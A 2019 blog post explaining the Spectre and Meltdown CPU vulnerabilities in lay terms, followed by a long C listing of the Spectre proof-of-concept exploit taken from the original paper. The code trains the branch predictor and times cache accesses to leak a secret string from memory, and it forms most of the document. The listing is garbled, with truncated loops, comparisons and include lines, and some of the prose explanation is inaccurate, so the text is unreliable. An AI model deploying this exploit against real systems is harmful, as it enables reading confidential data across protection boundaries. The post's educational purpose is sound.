What is Spectre and Meltdown, Why should you care?

Vidura Supun Ehalapitiya · February 9, 2019

2018 january was not a good month for the major CPU manufacturers like ARM, AMD and specially because of the vulnerabilities that were discovered by researchers named Spectre and Meltdown. Scary as they sounds these vulnerabilities managed to hide for like 20 years from us. Before we get a bit technical think about it as this,

You need to see the new Iphone model before the official release, so you try to go inside apple company, and no luck security is not letting you through but you know that apple engineers are allowed to use and test the phone, so you sit outside and watch till an engineer come out using the new phone

These vulnerabilities were a product of features that CPUs comes equipped with, “The Speculative execution”  and “Caching” both helping to CPU to get things done faster.

What is the Speculative Execution?

Speculative execution is if a program includes multiple logical branches, CPU starts executing all of them after branch predictor predicts and be ready with the answer even before it knows which one is the right branch  which will prevent pipeline stall or execution delay. As an example

IF(A) Print (A) ELSE Print(B)

Here CPU access both conditions before it tests that A is true. This does not have to be a logical branch even CPU guesses functions that most likely to execute by program and keep their results ready.\r\n

What is Cache?

When CPU needed some information it is slower to access the ram which is a different component that is located outside of the CPU, so cache is small storage space located inside CPU which can be accessed considerably faster than RAM and used to store things CPU needs often. Also when CPU needs something it first looks in the cache if it is in the cache we call it a cache hit otherwise a cache miss. In our scenario it is the result from speculative execution.The problem arises when these two things work with memory protection

Memory protection?

Memory protection is preventing unauthorized programs accessing other processes memories using various methods. When a process tries to access data it should go through a privilege check.Now that we covered the basic background based for Spectre and meltdown it is time to get to them.

Spectre

spectre

Using spectre an attacker can force a program to reveal data it should keep confidential. Here an attacker can use techniques  like flush-reload and evict-reload to load data to force the victim to load a cache line and then attacker perform  a memory read. If it is a cache hit access for the data will be faster than a cache miss, using this method attacker can figure out whether user read it form the cache line or not and flush that data out. This vulnerability affects almost all CPUs use out-of-order execution.

Meltdown

metl

Affect intel and apple processors that allow attacker that can run a program in a system to access any file inside that system bypassing memory protection techniques. This can be used to access virtual machines in cloud without any permission or privilege.

This is a example implemation in C

 


/\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \* \* Spectre PoC \* \* This source code originates from the example code provided in the \* "Spectre Attacks: Exploiting Speculative Execution" paper found at \* https://spectreattack.com/spectre.pdf \* \* Minor modifications have been made to fix compilation errors and \* improve documentation where possible. \* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

#include #include #include #ifdef \_MSC\_VER #include /\* for rdtsc, rdtscp, clflush \*/ #pragma optimize("gt",on) #else #include /\* for rdtsc, rdtscp, clflush \*/ #endif /\* ifdef \_MSC\_VER \*/

/\* Automatically detect if SSE2 is not available when SSE is advertized \*/ #ifdef \_MSC\_VER /\* MSC \*/ #if \_M\_IX86\_FP==1 #define NOSSE2 #endif #else /\* Not MSC \*/ #if defined(\_\_SSE\_\_) && !defined(\_\_SSE2\_\_) #define NOSSE2 #endif #endif /\* ifdef \_MSC\_VER \*/

#ifdef NOSSE2 #define NORDTSCP #define NOMFENCE #define NOCLFLUSH #endif

/\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Victim code. \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/ unsigned int array1\_size = 16; uint8\_t unused1\[64\]; uint8\_t array1\[16\] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8\_t unused2\[64\]; uint8\_t array2\[256 \* 512\];

char \* secret = "The Magic Words are Squeamish Ossifrage.";

uint8\_t temp = 0; /\* Used so compiler won’t optimize out victim\_function() \*/

#ifdef LINUX\_KERNEL\_MITIGATION /\* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 \*/ /\*\* \* array\_index\_mask\_nospec() - generate a mask that is ~0UL when the \* bounds check succeeds and 0 otherwise \* @index: array element index \* @size: number of elements in array \* \* Returns: \* 0 - (index < size) \*/ static inline unsigned long array\_index\_mask\_nospec(unsigned long index, unsigned long size) { unsigned long mask;

\_\_asm\_\_ \_\_volatile\_\_ ("cmp %1,%2; sbb %0,%0;" :"=r" (mask) :"g"(size),"r" (index) :"cc"); return mask; } #endif

void victim\_function(size\_t x) { if (x < array1\_size) { #ifdef INTEL\_MITIGATION /\* \* According to Intel et al, the best way to mitigate this is to \* add a serializing instruction after the boundary check to force \* the retirement of previous instructions before proceeding to \* the read. \* See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf \*/ \_mm\_lfence(); #endif #ifdef LINUX\_KERNEL\_MITIGATION x &= array\_index\_mask\_nospec(x, array1\_size); #endif temp &= array2\[array1\[x\] \* 512\]; } }

/\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Analysis code \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*/ #ifdef NOCLFLUSH #define CACHE\_FLUSH\_ITERATIONS 2048 #define CACHE\_FLUSH\_STRIDE 4096 uint8\_t cache\_flush\_array\[CACHE\_FLUSH\_STRIDE \* CACHE\_FLUSH\_ITERATIONS\];

/\* Flush memory using long SSE instructions \*/ void flush\_memory\_sse(uint8\_t \* addr) { float \* p = (float \*)addr; float c = 0.f; \_\_m128 i = \_mm\_setr\_ps(c, c, c, c);

int k, l; /\* Non-sequential memory addressing by looping through k by l \*/ for (k = 0; k < 4; k++) for (l = 0; l < 4; l++) \_mm\_stream\_ps(&p\[(l \* 4 + k) \* 4\], i); } #endif

/\* Report best guess in value\[0\] and runner-up in value\[1\] \*/ void readMemoryByte(int cache\_hit\_threshold, size\_t malicious\_x, uint8\_t value\[2\], int score\[2\]) { static int results\[256\]; int tries, i, j, k, mix\_i; unsigned int junk = 0; size\_t training\_x, x; register uint64\_t time1, time2; volatile uint8\_t \* addr;

#ifdef NOCLFLUSH int junk2 = 0; int l; (void)junk2; #endif

for (i = 0; i 0; tries--) {

#ifndef NOCLFLUSH /\* Flush array2\[256\*(0..255)\] from cache \*/ for (i = 0; i < 256; i++) \_mm\_clflush( & array2\[i \* 512\]); /\* intrinsic for clflush instruction \*/ #else /\* Flush array2\[256\*(0..255)\] from cache using long SSE instruction several times \*/ for (j = 0; j = 0; l-= CACHE\_FLUSH\_STRIDE) { junk2 = cache\_flush\_array\[l\]; } #endif

/\* Delay (can also mfence) \*/ for (volatile int z = 0; z > 16)); /\* Set x=-1 if j&6=0, else x=0 \*/ x = training\_x ^ (x & (malicious\_x ^ training\_x));

/\* Call the victim! \*/ victim\_function(x);

}

/\* Time reads. Order is lightly mixed up to prevent stride prediction \*/ for (i = 0; i < 256; i++) { mix\_i = ((i \* 167) + 13) & 255; addr = & array2\[mix\_i \* 512\];

/\* We need to accuratly measure the memory access to the current index of the array so we can determine which index was cached by the malicious mispredicted code. The best way to do this is to use the rdtscp instruction, which measures current processor ticks, and is also serialized. \*/

#ifndef NORDTSCP time1 = \_\_rdtscp( & junk); /\* READ TIMER \*/ junk = \* addr; /\* MEMORY ACCESS TO TIME \*/ time2 = \_\_rdtscp( & junk) - time1; /\* READ TIMER & COMPUTE ELAPSED TIME \*/ #else

/\* The rdtscp instruction was instroduced with the x86-64 extensions. Many older 32-bit processors won't support this, so we need to use the equivalent but non-serialized tdtsc instruction instead. \*/

#ifndef NOMFENCE /\* Since the rdstc instruction isn't serialized, newer processors will try to reorder it, ruining its value as a timing mechanism. To get around this, we use the mfence instruction to introduce a memory barrier and force serialization. mfence is used because it is portable across Intel and AMD. \*/

\_mm\_mfence(); time1 = \_\_rdtsc(); /\* READ TIMER \*/ \_mm\_mfence(); junk = \* addr; /\* MEMORY ACCESS TO TIME \*/ \_mm\_mfence(); time2 = \_\_rdtsc() - time1; /\* READ TIMER & COMPUTE ELAPSED TIME \*/ \_mm\_mfence(); #else /\* The mfence instruction was introduced with the SSE2 instruction set, so we have to ifdef it out on pre-SSE2 processors. Luckily, these older processors don't seem to reorder the rdtsc instruction, so not having mfence on older processors is less of an issue. \*/

time1 = \_\_rdtsc(); /\* READ TIMER \*/ junk = \* addr; /\* MEMORY ACCESS TO TIME \*/ time2 = \_\_rdtsc() - time1; /\* READ TIMER & COMPUTE ELAPSED TIME \*/ #endif #endif if ((int)time2 <= cache\_hit\_threshold && mix\_i != array1\[tries % array1\_size\]) results\[mix\_i\]++; /\* cache hit - add +1 to score for this value \*/ }

/\* Locate highest & second-highest results results tallies in j/k \*/ j = k = -1; for (i = 0; i = (2 \* results\[k\] + 5) || (results\[j\] == 2 && results\[k\] == 0)) break; /\* Clear success if best is > 2\*runner-up + 5 or 2/0) \*/ } results\[0\] ^= junk; /\* use junk so code above won’t get optimized out\*/ value\[0\] = (uint8\_t) j; score\[0\] = results\[j\]; value\[1\] = (uint8\_t) k; score\[1\] = results\[k\]; }

/\* \* Command line arguments: \* 1: Cache hit threshold (int) \* 2: Malicious address start (size\_t) \* 3: Malicious address count (int) \*/ int main(int argc, const char \* \* argv) {

/\* Default to a cache hit threshold of 80 \*/ int cache\_hit\_threshold = 80;

/\* Default for malicious\_x is the secret string address \*/ size\_t malicious\_x = (size\_t)(secret - (char \* ) array1);

/\* Default addresses to read is 40 (which is the length of the secret string) \*/ int len = 40;

int score\[2\]; uint8\_t value\[2\]; int i;

#ifdef NOCLFLUSH for (i = 0; i = 4) { sscanf(argv\[2\], "%p", (void \* \* )( &malicious\_x));

/\* Convert input value into a pointer \*/ malicious\_x -= (size\_t) array1;

sscanf(argv\[3\], "%d", &len); }

/\* Print git commit hash \*/ #ifdef GIT\_COMMIT\_HASH printf("Version: commit " GIT\_COMMIT\_HASH "\\n"); #endif

/\* Print cache hit threshold \*/ printf("Using a cache hit threshold of %d.\\n", cache\_hit\_threshold);

/\* Print build configuration \*/ printf("Build: "); #ifndef NORDTSCP printf("RDTSCP\_SUPPORTED "); #else printf("RDTSCP\_NOT\_SUPPORTED "); #endif #ifndef NOMFENCE printf("MFENCE\_SUPPORTED "); #else printf("MFENCE\_NOT\_SUPPORTED "); #endif #ifndef NOCLFLUSH printf("CLFLUSH\_SUPPORTED "); #else printf("CLFLUSH\_NOT\_SUPPORTED "); #endif #ifdef INTEL\_MITIGATION printf("INTEL\_MITIGATION\_ENABLED "); #else printf("INTEL\_MITIGATION\_DISABLED "); #endif #ifdef LINUX\_KERNEL\_MITIGATION printf("LINUX\_KERNEL\_MITIGATION\_ENABLED "); #else printf("LINUX\_KERNEL\_MITIGATION\_DISABLED "); #endif

printf("\\n");

printf("Reading %d bytes:\\n", len);

/\* Start the read loop to read each address \*/ while (--len >= 0) { printf("Reading at malicious\_x = %p... ", (void \* ) malicious\_x);

/\* Call readMemoryByte with the required cache hit threshold and malicious x address. value and score are arrays that are populated with the results. \*/ readMemoryByte(cache\_hit\_threshold, malicious\_x++, value, score);

/\* Display the results \*/ printf("%s: ", (score\[0\] >= 2 \* score\[1\] ? "Success" : "Unclear")); printf("0x%02X=’%c’ score=%d ", value\[0\], (value\[0\] > 31 && value\[0\] 0) { printf("(second best: 0x%02X=’%c’ score=%d)", value\[1\], (value\[1\] > 31 && value\[1\] < 127 ? value\[1\] : '?'), score\[1\]); }

printf("\\n"); } return (0); }

Twitter, Facebook